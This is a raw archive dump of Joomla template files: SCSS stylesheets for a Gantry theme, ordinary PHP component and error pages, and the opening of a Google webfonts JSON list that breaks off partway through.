		color: $fullwidth-heading-color;
	}
}

@media print {
	#g-fullwidth {
		background: #fff !important;
		color: #000 !important;
	}
}PK!9��//%it_sanctum/scss/sanctum/_maintop.scssnu&1i�#g-maintop {
	padding: $section-padding 0;
	background-color: $maintop-background-color;
	@if $maintop-background-image {
    	background-image: url($maintop-background-image);
    	background-repeat: unquote($maintop-background-repeat);
    	background-size: unquote($maintop-background-size);
    	background-attachment: unquote($maintop-background-attachment);
	}
	color: $maintop-text-color;
	h1, h2, h3, h4, h5, h6, strong {
		color: $maintop-heading-color;
	}
}

@media print {
	#g-maintop {
		background: #fff !important;
		color: #000 !important;
	}
}PK!�^����#it_sanctum/scss/sanctum/_aside.scssnu&1i�#g-aside {
	padding: $section-padding 0;
	background-color: $aside-background-color;
	@if $aside-background-image {
    	background-image: url($aside-background-image);
    	background-repeat: unquote($aside-background-repeat);
    	background-size: unquote($aside-background-size);
    	background-attachment: unquote($aside-background-attachment);
	}
	color: $aside-text-color;
	h1, h2, h3, h4, h5, h6, strong {
		color: $aside-heading-color;
	}
	.g-features2-particle {
		.g-features2-particle-item {
			flex-basis: 100%;
			margin-bottom: ($content-margin + $content-padding);
				&:last-child {
					margin-bottom: 0;
				}
		}
		.g-features2-particle-title {
			font-size: 1.875rem;
			line-height: 2rem;
		}
		&.style5 {
			.g-features2-particle-icon {
				border-radius: 0px;
				border: 1px solid $base-border-color;
			}
			.g-features2-particle-title {
				font-size: 1.35rem;
			}
		}
	}
}

@media print {
	#g-aside {
		background: #fff !important;
		color: #000 !important;
	}
}PK!P�Z�MM(it_sanctum/scss/sanctum/_subfeature.scssnu&1i�#g-subfeature {
	padding: $section-padding 0;
	background-color: $subfeature-background-color;
	@if $subfeature-background-image {
    	background-image: url($subfeature-background-image);
    	background-repeat: unquote($subfeature-background-repeat);
    	background-size: unquote($subfeature-background-size);
    	background-attachment: unquote($subfeature-background-attachment);
	}
	color: $subfeature-text-color;
	h1, h2, h3, h4, h5, h6, strong {
		color: $subfeature-heading-color;
	}
}

@media print {
	#g-subfeature {
		background: #fff !important;
		color: #000 !important;
	}
}PK!?��0it_sanctum/scss/sanctum/_content-pro-joomla.scssnu&1i�// Set the variable defaults in case they are missing in the template
$base-title-color: #4d4d4d !default;

.g-content-pro {
	&:not(.gutter-disabled) {
		margin-left: -($content-padding);
		margin-right: -($content-padding);
		> .g-grid {
			margin-bottom: ($content-padding*2);
			&:last-child {
				margin-bottom: 0;
				> .g-block {
					&:last-child {
						.g-content-pro-item {
							@include breakpoint(mobile-only) {
								margin-bottom: 0 !important;
							}
						}
					}
				}
			}
			@include breakpoint(mobile-only) {
				margin-bottom: 0;
			}
		}
		.g-content-pro-item {
			@include breakpoint(mobile-only) {
				margin-bottom: ($content-padding*2) !important;
			}
		}
	}
}

.g-content-pro, .g-content-pro-slider, .g-content-pro-slideset {
	text-align: center;
	&.g-pullup {
		margin-top: -($content-margin + $content-padding + $section-padding + rem(75px));
		position: relative;
		z-index: 21;
		.g-content-pro-item {
			border: none;
		}
	}
	&.gutter-disabled {
		.g-content-pro-item {
			border: none;
		}
		.uk-slideset {
			margin-left: 0;
			&.uk-grid {
				> * {
					padding-left: 0;
				}
			}
		}
	}
	.g-content {
		margin: 0;
		padding-top: 0;
		padding-bottom: 0;
	}
	.g-content-pro-item {
		border: 1px solid $base-border-color;
		width: 100%;
		@include breakpoint(mobile-only) {
			margin-bottom: ($content-margin + $content-padding)*2;
			&:last-child {
				margin-bottom: 0;
			}
		}
	}
	.g-content-pro-image {
		width: 100%;
		background-position: center;
		background-size: cover;
		> a {
			display: block;
			width: 100%;
			height: 100%;
		}
		img {
			@include user-select(none);
		}
	}
	.g-info-container {
		padding: 20px;
		background: #ffffff;
	}
	p {
		margin: 0;
	}
	.g-content-pro-title {
		margin: 0;
		a {
			color: $base-title-color;
			&:hover {
				color: $accent-color-1;
			}
		}
	}
	.g-content-pro-desc {
		margin-top: 10px;
	}
	.g-info-container-style2 {
		&.uk-overlay-panel {
			padding: 15px;
			p {
				margin-top: 5px;
			}
			a {
				color: #ffffff;
				&:hover {
					color: $accent-color-1;
				}
			}
		}
		.g-article-details {
			color: lighten($base-text-color, 35%);
		}
	}
	.g-article-details {
		margin-top: 10px;
		font-size: 90%;
		color: lighten($base-text-color, 15%);
		> span {
			margin-right: 10px;
			&:last-child {
				margin-right: 0;
			}
			i {
				margin-right: 5px;
			}
		}
	}
	.g-article-read-more {
		margin-top: 15px;
	}
	&.style3 {
		.g-info-container-style2 {
			@include background(linear-gradient(to bottom, rgba(0, 0, 0, 0) 0px, rgba(0, 0, 0, 0.15) 20%, rgba(0, 0, 0, 0.8) 100%));
			padding: 20px;
			a {
				color: #ffffff;
				&:hover {
					color: #ffffff;
					text-decoration: underline;
				}
			}
		}
		.g-content-pro-image {
			.uk-overlay {
				img {
					@include transition(all 1s);
				}
			}
			&:hover {
				.uk-overlay {
					img {
						@include transform(scale(1.15));
					}
				}
			}
		}
	}
}PK!��˴��+it_sanctum/scss/sanctum/_paypal-donate.scssnu&1i�.g-paypaldonate {
	margin-left: -($content-padding);
	margin-right: -($content-padding);
	text-align: center;
	.g-paypaldonate-form {
		form {
			margin: 0;
		}
		.g-paypaldonate-button {
			.g-paypaldonate-icon {
				padding: 1.5rem;
				background: rgba(0,0,0,0.2);
			}
			input[type="submit"] {
				background: transparent;
				padding: 1.25rem;
				margin-top: -3px;
			}
			
			&.button {
				padding: 0;
				border: 0;
			}
		}
	}
}PK!�Y�#it_sanctum/scss/sanctum-joomla.scssnu&1i�// REQUIRED DEPENDENCIES - DO NOT CHANGE

// Load Third Party Libraries
@import "vendor/bourbon/bourbon";

// Load Nucleus Configuration
@import "configuration/nucleus/base";

// Load Nucleus Mixins and Functions
@import "nucleus/functions/base";
@import "nucleus/mixins/base";

// Load Theme Variable Driven Nucleus Elements
@import "joomla/theme/base";

// Load Template Configuration
@import "configuration/base";

//-------------------------------------------

// JOOMLA TEMPLATE SPECIFIC
@import "sanctum-joomla/core";
@import "sanctum-joomla/typography";
@import "sanctum-joomla/forms";
@import "sanctum-joomla/tabs";
@import "sanctum-joomla/utilities";
@import "sanctum-joomla/contacts";
@import "sanctum-joomla/breadcrumb";
@import "sanctum-joomla/blog";
@import "sanctum-joomla/revolution";
@import "sanctum-joomla/nssp2";
@import "sanctum-joomla/search";
@import "sanctum-joomla/uikit";

//-------------------------------------------

// BREAKPOINTS
@import "joomla/theme/breakpoints/base";

//-------------------------------------------
PK!D]q��it_sanctum/component.phpnu&1i�<?php
/**
 * @package   Gantry 5 Theme
 * @author    RocketTheme http://www.rockettheme.com
 * @copyright Copyright (C) 2007 - 2015 RocketTheme, LLC
 * @license   GNU/GPLv2 and later
 *
 * http://www.gnu.org/licenses/gpl-2.0.html
 */

defined('_JEXEC') or die;

// Bootstrap Gantry framework or fail gracefully (inside included file).
$gantry = include __DIR__ . '/includes/gantry.php';

/** @var \Gantry\Framework\Theme $theme */
$theme = $gantry['theme'];

$raw = JFactory::getApplication()->input->getString('type') == 'raw';

// Reset used outline configuration.
unset($gantry['configuration']);

// Render the component.
echo $theme
    ->setLayout('_body_only')
    ->render($raw ? 'raw.html.twig' : 'component.html.twig');
PK!�k{�ggflex/error.phpnu&1i�<?php
/**
 * Flex @package Helix3 Framework
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2019 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
//no direct access
defined ('_JEXEC') or die ('restricted access');

$doc = JFactory::getDocument();
$params = JFactory::getApplication()->getTemplate('true')->params;

//Load Helix
$helix3_path = JPATH_PLUGINS.'/system/helix3/core/helix3.php';

if (file_exists($helix3_path)) {
    require_once($helix3_path);
    $this->helix3 = Helix3::getInstance();
} else {
    die('Please install and activate helix plugin');
}

// Remove the generator meta tag
if($params->get('remove_joomla_generator')) {
  $doc->setGenerator(null);
}

//Favicon
if($favicon = $params->get('favicon')) {
    $doc->addFavicon( JURI::base(true) . '/' .  $favicon);
} else {
    $doc->addFavicon( $this->baseurl . '/templates/' . $this->template . '/images/favicon.ico' );
}

//Stylesheets
$doc->addStylesheet( $this->baseurl . '/templates/' . $this->template . '/css/bootstrap.min.css' );
$doc->addStylesheet( $this->baseurl . '/templates/' . $this->template . '/css/font-awesome.min.css' );
$doc->addStylesheet( $this->baseurl . '/templates/' . $this->template . '/css/template.css' );

$webfonts = array();
if( $params->get('enable_body_font') ) {
    $webfonts['body'] = $params->get('body_font');
}
//Heading1 Font
if( $params->get('enable_h1_font') ) {
    $webfonts['h1'] = $params->get('h1_font');
}
//Heading3 Font
if( $params->get('enable_h3_font') ) {
    $webfonts['h3'] = $params->get('h3_font');
}
$this->helix3->addGoogleFont($webfonts);

//Custom background image
if($error_bg_image = $this->helix3->getParam('error_bg_image')) {
	
	$error_bg = 'background-color: transparent;';
    $error_bg .= 'background-image: url(' . JURI::base(true ) . '/' . $error_bg_image . ');';
    $error_bg .= 'background-repeat: no-repeat;';
    $error_bg .= 'background-size: cover;';
    $error_bg .= 'background-attachment: fixed;';
    $error_bg .= 'background-position: 50% 50%;';
    $error_bg = '.error-page body .container {' . $error_bg . '}'; 

    $doc->addStyledeclaration( $error_bg );
}

$error_bg_image != '' ? $error_bg_image_class = ' with-bckg-img' : $error_bg_image_class = '';

$doc->setTitle($this->error->getCode() . ' - '.$this->title);
$header_contents = '';
if(!class_exists('JDocumentRendererHead')) {
  $head = JPATH_LIBRARIES . '/joomla/document/html/renderer/head.php';
  if(file_exists($head)) {
    require_once($head);
  }
}
$header_renderer = new JDocumentRendererHead($doc);
$header_contents = $header_renderer->render(null);

?>
<!DOCTYPE html>
<html class="error-page" xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>">
	<head>
	  	<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
	    <meta name="viewport" content="width=device-width, initial-scale=1">
		<?php echo $header_contents; ?>
	</head>
	<body>
		<div class="error-page-inner<?php echo $error_bg_image_class; ?>">
            <div class="container">
            	<?php if ($error_bg_image) { ?>
				<p><i class="pe-7s-compass"></i></p>
                <?php } else { ?>
                <p><i class="fas fa-exclamation-triangle"></i></p>
                <?php } ?>
                <h1 class="error-code"> <?php echo $this->error->getCode(); ?></h1>
                <h3 class="error-code-message"><?php echo JText::_('HELIX_404'); ?></h3>
                <p class="error-message"><?php echo JText::_('HELIX_404_MESSAGE'); ?></p>
                <a class="btn btn-error btn-lg" href="<?php echo $this->baseurl; ?>/"><i class="fas fa-angle-left"></i> <?php echo JText::_('HELIX_GO_BACK'); ?></a>
                <?php echo $doc->getBuffer('modules', '404', array('style' => 'sp_xhtml')); ?>
            </div>
		</div>
	</body>
</html>PK!���pc�
c�
flex/webfonts/webfonts.jsonnu&1i�{
  "kind": "webfonts#webfontList",
  "items": [
    {
      "family": "ABeeZee",
      "variants": [
        "regular",
        "italic"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v14",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/abeezee/v14/esDR31xSG-6AGleN6tKukbcHCpE.ttf",
        "italic": "http://fonts.gstatic.com/s/abeezee/v14/esDT31xSG-6AGleN2tCklZUCGpG-GQ.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Abel",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-09-10",
      "files": {
        "regular": "http://fonts.gstatic.com/s/abel/v12/MwQ5bhbm2POE6VhLPJp6qGI.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Abhaya Libre",
      "variants": [
        "regular",
        "500",
        "600",
        "700",
        "800"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "sinhala"
      ],
      "version": "v6",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/abhayalibre/v6/e3tmeuGtX-Co5MNzeAOqinEge0PWovdU4w.ttf",
        "500": "http://fonts.gstatic.com/s/abhayalibre/v6/e3t5euGtX-Co5MNzeAOqinEYj2ryqtxI6oYtBA.ttf",
        "600": "http://fonts.gstatic.com/s/abhayalibre/v6/e3t5euGtX-Co5MNzeAOqinEYo23yqtxI6oYtBA.ttf",
        "700": "http://fonts.gstatic.com/s/abhayalibre/v6/e3t5euGtX-Co5MNzeAOqinEYx2zyqtxI6oYtBA.ttf",
        "800": "http://fonts.gstatic.com/s/abhayalibre/v6/e3t5euGtX-Co5MNzeAOqinEY22_yqtxI6oYtBA.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Abril Fatface",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v12",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/abrilfatface/v12/zOL64pLDlL1D99S8g8PtiKchm-BsjOLhZBY.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Aclonica",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/aclonica/v11/K2FyfZJVlfNNSEBXGb7TCI6oBjLz.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Acme",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-10-22",
      "files": {
        "regular": "http://fonts.gstatic.com/s/acme/v11/RrQfboBx-C5_bx3Lb23lzLk.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Actor",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/actor/v10/wEOzEBbCkc5cO3ekXygtUMIO.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Adamina",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v14",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/adamina/v14/j8_r6-DH1bjoc-dwu-reETl4Bno.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Advent Pro",
      "variants": [
        "100",
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "greek",
        "latin",
        "latin-ext"
      ],
      "version": "v11",
      "lastModified": "2020-09-02",
      "files": {
        "100": "http://fonts.gstatic.com/s/adventpro/v11/V8mCoQfxVT4Dvddr_yOwjVmtLZxcBtItFw.ttf",
        "200": "http://fonts.gstatic.com/s/adventpro/v11/V8mDoQfxVT4Dvddr_yOwjfWMDbZyCts0DqQ.ttf",
        "300": "http://fonts.gstatic.com/s/adventpro/v11/V8mDoQfxVT4Dvddr_yOwjZGPDbZyCts0DqQ.ttf",
        "regular": "http://fonts.gstatic.com/s/adventpro/v11/V8mAoQfxVT4Dvddr_yOwtT2nKb5ZFtI.ttf",
        "500": "http://fonts.gstatic.com/s/adventpro/v11/V8mDoQfxVT4Dvddr_yOwjcmODbZyCts0DqQ.ttf",
        "600": "http://fonts.gstatic.com/s/adventpro/v11/V8mDoQfxVT4Dvddr_yOwjeWJDbZyCts0DqQ.ttf",
        "700": "http://fonts.gstatic.com/s/adventpro/v11/V8mDoQfxVT4Dvddr_yOwjYGIDbZyCts0DqQ.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Aguafina Script",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/aguafinascript/v9/If2QXTv_ZzSxGIO30LemWEOmt1bHqs4pgicOrg.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Akronim",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/akronim/v10/fdN-9sqWtWZZlHRp-gBxkFYN-a8.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Aladin",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/aladin/v9/ZgNSjPJFPrvJV5f16Sf4pGT2Ng.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Alata",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v2",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/alata/v2/PbytFmztEwbIofe6xKcRQEOX.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Alatsi",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v2",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/alatsi/v2/TK3iWkUJAxQ2nLNGHjUHte5fKg.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Aldrich",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/aldrich/v11/MCoTzAn-1s3IGyJMZaAS3pP5H_E.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Alef",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "hebrew",
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/alef/v12/FeVfS0NQpLYgrjJbC5FxxbU.ttf",
        "700": "http://fonts.gstatic.com/s/alef/v12/FeVQS0NQpLYglo50L5la2bxii28.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Alegreya",
      "variants": [
        "regular",
        "italic",
        "500",
        "500italic",
        "700",
        "700italic",
        "800",
        "800italic",
        "900",
        "900italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "greek",
        "greek-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v16",
      "lastModified": "2020-10-22",
      "files": {
        "regular": "http://fonts.gstatic.com/s/alegreya/v16/4UaBrEBBsBhlBjvfkRLmzanB44N1.ttf",
        "italic": "http://fonts.gstatic.com/s/alegreya/v16/4UaHrEBBsBhlBjvfkSLkx63j5pN1MwI.ttf",
        "500": "http://fonts.gstatic.com/s/alegreya/v16/4UaGrEBBsBhlBjvfkSoS5I3JyJ98KhtH.ttf",
        "500italic": "http://fonts.gstatic.com/s/alegreya/v16/4UaErEBBsBhlBjvfkSLk_1nKwpteLwtHJlc.ttf",
        "700": "http://fonts.gstatic.com/s/alegreya/v16/4UaGrEBBsBhlBjvfkSpa4o3JyJ98KhtH.ttf",
        "700italic": "http://fonts.gstatic.com/s/alegreya/v16/4UaErEBBsBhlBjvfkSLk_xHMwpteLwtHJlc.ttf",
        "800": "http://fonts.gstatic.com/s/alegreya/v16/4UaGrEBBsBhlBjvfkSpG4Y3JyJ98KhtH.ttf",
        "800italic": "http://fonts.gstatic.com/s/alegreya/v16/4UaErEBBsBhlBjvfkSLk_w3PwpteLwtHJlc.ttf",
        "900": "http://fonts.gstatic.com/s/alegreya/v16/4UaGrEBBsBhlBjvfkSpi4I3JyJ98KhtH.ttf",
        "900italic": "http://fonts.gstatic.com/s/alegreya/v16/4UaErEBBsBhlBjvfkSLk_ynOwpteLwtHJlc.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Alegreya SC",
      "variants": [
        "regular",
        "italic",
        "500",
        "500italic",
        "700",
        "700italic",
        "800",
        "800italic",
        "900",
        "900italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "greek",
        "greek-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v14",
      "lastModified": "2020-10-22",
      "files": {
        "regular": "http://fonts.gstatic.com/s/alegreyasc/v14/taiOGmRtCJ62-O0HhNEa-a6o05E5abe_.ttf",
        "italic": "http://fonts.gstatic.com/s/alegreyasc/v14/taiMGmRtCJ62-O0HhNEa-Z6q2ZUbbKe_DGs.ttf",
        "500": "http://fonts.gstatic.com/s/alegreyasc/v14/taiTGmRtCJ62-O0HhNEa-ZZc-rUxQqu2FXKD.ttf",
        "500italic": "http://fonts.gstatic.com/s/alegreyasc/v14/taiRGmRtCJ62-O0HhNEa-Z6q4WEySK-UEGKDBz4.ttf",
        "700": "http://fonts.gstatic.com/s/alegreyasc/v14/taiTGmRtCJ62-O0HhNEa-ZYU_LUxQqu2FXKD.ttf",
        "700italic": "http://fonts.gstatic.com/s/alegreyasc/v14/taiRGmRtCJ62-O0HhNEa-Z6q4Sk0SK-UEGKDBz4.ttf",
        "800": "http://fonts.gstatic.com/s/alegreyasc/v14/taiTGmRtCJ62-O0HhNEa-ZYI_7UxQqu2FXKD.ttf",
        "800italic": "http://fonts.gstatic.com/s/alegreyasc/v14/taiRGmRtCJ62-O0HhNEa-Z6q4TU3SK-UEGKDBz4.ttf",
        "900": "http://fonts.gstatic.com/s/alegreyasc/v14/taiTGmRtCJ62-O0HhNEa-ZYs_rUxQqu2FXKD.ttf",
        "900italic": "http://fonts.gstatic.com/s/alegreyasc/v14/taiRGmRtCJ62-O0HhNEa-Z6q4RE2SK-UEGKDBz4.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Alegreya Sans",
      "variants": [
        "100",
        "100italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "700",
        "700italic",
        "800",
        "800italic",
        "900",
        "900italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "greek",
        "greek-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v13",
      "lastModified": "2020-10-22",
      "files": {
        "100": "http://fonts.gstatic.com/s/alegreyasans/v13/5aUt9_-1phKLFgshYDvh6Vwt5TltuGdShm5bsg.ttf",
        "100italic": "http://fonts.gstatic.com/s/alegreyasans/v13/5aUv9_-1phKLFgshYDvh6Vwt7V9V3G1WpGtLsgu7.ttf",
        "300": "http://fonts.gstatic.com/s/alegreyasans/v13/5aUu9_-1phKLFgshYDvh6Vwt5fFPmE18imdCqxI.ttf",
        "300italic": "http://fonts.gstatic.com/s/alegreyasans/v13/5aUo9_-1phKLFgshYDvh6Vwt7V9VFE92jkVHuxKiBA.ttf",
        "regular": "http://fonts.gstatic.com/s/alegreyasans/v13/5aUz9_-1phKLFgshYDvh6Vwt3V1nvEVXlm4.ttf",
        "italic": "http://fonts.gstatic.com/s/alegreyasans/v13/5aUt9_-1phKLFgshYDvh6Vwt7V9tuGdShm5bsg.ttf",
        "500": "http://fonts.gstatic.com/s/alegreyasans/v13/5aUu9_-1phKLFgshYDvh6Vwt5alOmE18imdCqxI.ttf",
        "500italic": "http://fonts.gstatic.com/s/alegreyasans/v13/5aUo9_-1phKLFgshYDvh6Vwt7V9VTE52jkVHuxKiBA.ttf",
        "700": "http://fonts.gstatic.com/s/alegreyasans/v13/5aUu9_-1phKLFgshYDvh6Vwt5eFImE18imdCqxI.ttf",
        "700italic": "http://fonts.gstatic.com/s/alegreyasans/v13/5aUo9_-1phKLFgshYDvh6Vwt7V9VBEh2jkVHuxKiBA.ttf",
        "800": "http://fonts.gstatic.com/s/alegreyasans/v13/5aUu9_-1phKLFgshYDvh6Vwt5f1LmE18imdCqxI.ttf",
        "800italic": "http://fonts.gstatic.com/s/alegreyasans/v13/5aUo9_-1phKLFgshYDvh6Vwt7V9VGEt2jkVHuxKiBA.ttf",
        "900": "http://fonts.gstatic.com/s/alegreyasans/v13/5aUu9_-1phKLFgshYDvh6Vwt5dlKmE18imdCqxI.ttf",
        "900italic": "http://fonts.gstatic.com/s/alegreyasans/v13/5aUo9_-1phKLFgshYDvh6Vwt7V9VPEp2jkVHuxKiBA.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Alegreya Sans SC",
      "variants": [
        "100",
        "100italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "700",
        "700italic",
        "800",
        "800italic",
        "900",
        "900italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "greek",
        "greek-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v12",
      "lastModified": "2020-10-22",
      "files": {
        "100": "http://fonts.gstatic.com/s/alegreyasanssc/v12/mtGn4-RGJqfMvt7P8FUr0Q1j-Hf1Dipl8g5FPYtmMg.ttf",
        "100italic": "http://fonts.gstatic.com/s/alegreyasanssc/v12/mtGl4-RGJqfMvt7P8FUr0Q1j-Hf1BkxdlgRBH452Mvds.ttf",
        "300": "http://fonts.gstatic.com/s/alegreyasanssc/v12/mtGm4-RGJqfMvt7P8FUr0Q1j-Hf1DuJH0iRrMYJ_K-4.ttf",
        "300italic": "http://fonts.gstatic.com/s/alegreyasanssc/v12/mtGk4-RGJqfMvt7P8FUr0Q1j-Hf1BkxdXiZhNaB6O-51OA.ttf",
        "regular": "http://fonts.gstatic.com/s/alegreyasanssc/v12/mtGh4-RGJqfMvt7P8FUr0Q1j-Hf1Nk5v9ixALYs.ttf",
        "italic": "http://fonts.gstatic.com/s/alegreyasanssc/v12/mtGn4-RGJqfMvt7P8FUr0Q1j-Hf1Bkxl8g5FPYtmMg.ttf",
        "500": "http://fonts.gstatic.com/s/alegreyasanssc/v12/mtGm4-RGJqfMvt7P8FUr0Q1j-Hf1DrpG0iRrMYJ_K-4.ttf",
        "500italic": "http://fonts.gstatic.com/s/alegreyasanssc/v12/mtGk4-RGJqfMvt7P8FUr0Q1j-Hf1BkxdBidhNaB6O-51OA.ttf",
        "700": "http://fonts.gstatic.com/s/alegreyasanssc/v12/mtGm4-RGJqfMvt7P8FUr0Q1j-Hf1DvJA0iRrMYJ_K-4.ttf",
        "700italic": "http://fonts.gstatic.com/s/alegreyasanssc/v12/mtGk4-RGJqfMvt7P8FUr0Q1j-Hf1BkxdTiFhNaB6O-51OA.ttf",
        "800": "http://fonts.gstatic.com/s/alegreyasanssc/v12/mtGm4-RGJqfMvt7P8FUr0Q1j-Hf1Du5D0iRrMYJ_K-4.ttf",
        "800italic": "http://fonts.gstatic.com/s/alegreyasanssc/v12/mtGk4-RGJqfMvt7P8FUr0Q1j-Hf1BkxdUiJhNaB6O-51OA.ttf",
        "900": "http://fonts.gstatic.com/s/alegreyasanssc/v12/mtGm4-RGJqfMvt7P8FUr0Q1j-Hf1DspC0iRrMYJ_K-4.ttf",
        "900italic": "http://fonts.gstatic.com/s/alegreyasanssc/v12/mtGk4-RGJqfMvt7P8FUr0Q1j-Hf1BkxddiNhNaB6O-51OA.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Aleo",
      "variants": [
        "300",
        "300italic",
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v4",
      "lastModified": "2020-09-02",
      "files": {
        "300": "http://fonts.gstatic.com/s/aleo/v4/c4mg1nF8G8_syKbr9DVDno985KM.ttf",
        "300italic": "http://fonts.gstatic.com/s/aleo/v4/c4mi1nF8G8_swAjxeDdJmq159KOnWA.ttf",
        "regular": "http://fonts.gstatic.com/s/aleo/v4/c4mv1nF8G8_s8ArD0D1ogoY.ttf",
        "italic": "http://fonts.gstatic.com/s/aleo/v4/c4mh1nF8G8_swAjJ1B9tkoZl_Q.ttf",
        "700": "http://fonts.gstatic.com/s/aleo/v4/c4mg1nF8G8_syLbs9DVDno985KM.ttf",
        "700italic": "http://fonts.gstatic.com/s/aleo/v4/c4mi1nF8G8_swAjxaDBJmq159KOnWA.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Alex Brush",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v12",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/alexbrush/v12/SZc83FzrJKuqFbwMKk6EtUL57DtOmCc.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Alfa Slab One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v10",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/alfaslabone/v10/6NUQ8FmMKwSEKjnm5-4v-4Jh6dVretWvYmE.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Alice",
      "variants": [
        "regular"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/alice/v12/OpNCnoEEmtHa6FcJpA_chzJ0.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Alike",
      "variants": [
        "regular"
      ],
      "subsets": [
